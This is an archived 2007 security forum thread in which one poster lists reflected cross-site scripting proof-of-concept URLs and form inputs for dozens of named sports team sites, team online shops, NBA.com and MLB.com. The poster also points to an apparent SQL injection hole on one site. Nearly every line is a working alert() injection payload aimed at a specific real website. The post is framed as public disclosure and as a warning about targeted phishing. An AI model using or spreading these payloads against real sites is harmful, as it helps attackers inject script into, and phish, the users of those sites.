Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 12:05AM

Like millions of people, I love sports and I regularly go to my favorite team sites to catch up on the latest news. I also sign up for newsletters notifying me of the latest events. Thinking about this though brings up the definite possibility of targeted phishing attacks using these types of sites. So I decided I would check and see which sites had obvious xss issues.

http://www.kcchiefs.com/news/features/ ("><script>alert('xss');</script> in "Chiefs Pulse" field)

http://www.buffalobills.com/includes/iframes/media_channels.jsp?search_terms=<script>alert('xss');</script>

http://www.miamidolphinsproshop.com/main_search.cfm ("><script>alert('xss');</script> in Item Description or Product #) Funny thing is they filter the search box...

http://www.patriots.com/search/index.cfm?ac=SearchResults&subnav=news&searchstring=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&PCID=41&PCID=47

http://proshop.bengals.com/istar.asp?a=6&id=11R1Q!REEB&csurl="><script>alert('xss');</script>

http://www.clevelandbrowns.com/fans/login.php ("><script>alert('xss');</script in email field)

http://news.steelers.com/article/search ('><script>alert('xss');</script> in search field)

http://www.houstontexans.com/news/index.php?section=<script>alert('xss');</script>

http://www.colts.com/ ("><script>alert('xss');</script> in search field)

http://www.titansproshop.com/main_search.cfm ("><script>alert('xss');</script> in item description field) Note: http://www.titansonline.com appears to be sql injectible as well.

http://www.denverbroncos.com/page.php?id=349&videoID=1617&type=broncosTV&year="><script>alert(1);</script>&month=

http://www.chargersproshop.com/main_search.cfm ("><script>alert('xss');</script> in Item Description field)

http://www.cowboysonlineproshop.com/main_search.cfm ("><script>alert('xss');</script> in Item Description field)

http://www.giants.com/search.asp?KEYWORDS=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&submit.x=8&submit.y=13

http://www.chicagobears.com/ ("><script>alert(1);</script> in search field)

http://www.detroitlionsstore.com/search.cfm (<script>alert(1);</script> in search field)

http://www.atlantafalcons.com/includes/display/emailArticle.jsp?url=$2Fteam%2Farticle.jsp%3Fid%3D&title="><script>alert(1);</script>

http://shop.panthers.com/product/search/?SearchText=%27%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&orderby=Name&lowPrice=&highPrice=

http://www.neworleanssaints.com/searchresult.cfm?md=sitesearch&source="><script>alert(1);</script>&searchkeyword=test

http://www.cardinalsproshop.com/main_search.cfm ("><script>alert(1);</script> in Item Description field)

http://www.stlouisrams.com/team/players/"><script>alert(1);</script>

http://49ers.com/pressbox/news_detail.php?PRKey=2879&section=</title><script>alert(1);</script>



Edited 3 time(s). Last edit at 03/02/2007 12:27AM by Mephisto.

Options: ReplyQuote
Re: Sport Teams XSS vulns...
Posted by: Mephisto
Date: March 02, 2007 10:58PM

http://www.nba.com/statistics/player/Scoring.jsp?league=00&season=12006&conf="><script>alert(1);</script>&position=0&splitType=9&splitScope=GAME&qualified=N&yearsExp=-1&splitDD=

http://mlb.mlb.com/stats/sortable_player_stats.jsp?print=""><script>alert(1);</script> <-- it throws numerous alerts

Options: ReplyQuote


Sorry, only registered users may post in this forum.